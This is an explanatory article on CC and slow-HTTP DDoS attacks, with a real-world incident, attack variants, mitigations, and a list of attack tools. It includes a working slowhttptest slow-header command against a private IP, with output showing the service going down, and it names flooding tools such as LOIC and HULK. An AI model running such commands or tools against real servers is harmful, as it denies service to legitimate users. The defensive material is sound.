Understanding CC Attacks and Slow DDoS: Mechanisms, Tools, and Defenses

Background of a Real‑World Incident

Several years ago an e‑commerce platform suffered a massive CC (Challenge Collapsar) attack that nearly crippled the entire site. Traffic monitoring showed a sudden spike in UV and client IP counts at 10:00, increasing thousands of times. CPU resources were exhausted, causing the servers to become extremely slow, and outbound bandwidth was saturated, resulting in blank pages and error messages for users.

The attack was triggered by a limited‑edition product launch, where attackers registered massive numbers of accounts via a phone‑verification platform, prepared scripts, and distributed them to many proxies or compromised machines ("zombies").

Fundamental Concepts

Zombie hosts & botnets : Compromised computers (PCs, phones, cloud VMs) that are controlled by malicious software and coordinated as a botnet.

Meat‑chicken (zombie) machines : Any device that an attacker can control, regardless of its inclusion in a botnet.

DDoS : Distributed Denial of Service attacks that flood a target with massive legitimate‑looking requests, exhausting CPU, memory, or bandwidth.

CC attack (Challenge Collapsar, formerly Fatboy): A type of DDoS where attackers use proxies or zombies to continuously request a target, draining resources and making the site inaccessible.

Slow Attack Variants

Slow attacks exploit thread‑based web servers that allocate a thread per connection and wait for the full HTTP request before releasing the connection.

1. Slow headers : The attacker opens a connection and sends HTTP headers extremely slowly (e.g., one header every 10 seconds). The server keeps the connection open, consuming resources.

Example command using slowhttptest:

slowhttptest -H -c 1000 -l 300 -u http://192.168.2.16/test/

Sample output:

slowhttptest version 1.7
- https://code.google.com/p/slowhttptest/ -
test type:               SLOW HEADERS
number of connections:   1000
URL:                     http://192.168.2.16/test/
verb:                    GET
Content‑Length header value: 4096
follow up data max size: 68
interval between follow up data: 10 seconds
connections per seconds: 50
probe connection timeout: 5 seconds
test duration:           300 seconds
using proxy:            no proxy

Resulting connection statistics (example):

initializing: 0
pending: 426
connected: 407
error: 0
closed: 167
service available: NO

2. Slow body : The attacker sends a POST request with a huge Content‑Length header but transmits the body extremely slowly, keeping the server waiting and holding the connection.

3. Slow read : After sending a full request, the client reads the server’s response at a very low rate (or not at all), sending TCP zero‑window updates to prevent the server from sending more data, thus holding the connection.

Mitigation Strategies

1. IP rate limiting : Configure gateway (Apache, Nginx, Zuul, etc.) to limit requests per IP per second/minute and drop excess traffic.

2. User‑group routing : Separate new and existing users into different server groups; route suspicious new‑user traffic to a dedicated pool.

3. Port change : Temporarily move the service to a non‑standard port to disrupt ongoing attacks (though attackers can adapt).

4. High‑protection IP services : Use DDoS‑mitigation providers that filter traffic before it reaches the origin server, offering massive bandwidth and IP black‑listing based on behavior analysis.

5. Page staticization : Serve static assets, leverage CDN caching, and reduce backend calls to lower the impact of traffic spikes.

6. Hide real IP : Hide the origin IP behind CDN or high‑protection IP, avoid direct outbound connections from the business host, and protect sub‑domains and MX records from leaking the real IP.

Common Distributed Attack Tools

LOIC – a GUI‑based tool written in C# that can flood a target with TCP/UDP/HTTP traffic.

HULK – generates many unique HTTP requests to bypass caching.

Darkddoser – uses botnets to launch HTTP attacks.

Slowhttptest – configurable tool for slow‑header, slow‑body, slow‑read, and other slow‑request attacks.

Zarp – Python‑based framework offering scanning, sniffing, and DDoS stress testing.

Conclusion

While no system can be made completely invulnerable, a layered defense that includes rate limiting, IP hiding, high‑capacity mitigation services, and careful architecture (e.g., event‑based servers) can significantly reduce the risk and impact of CC and other DDoS attacks.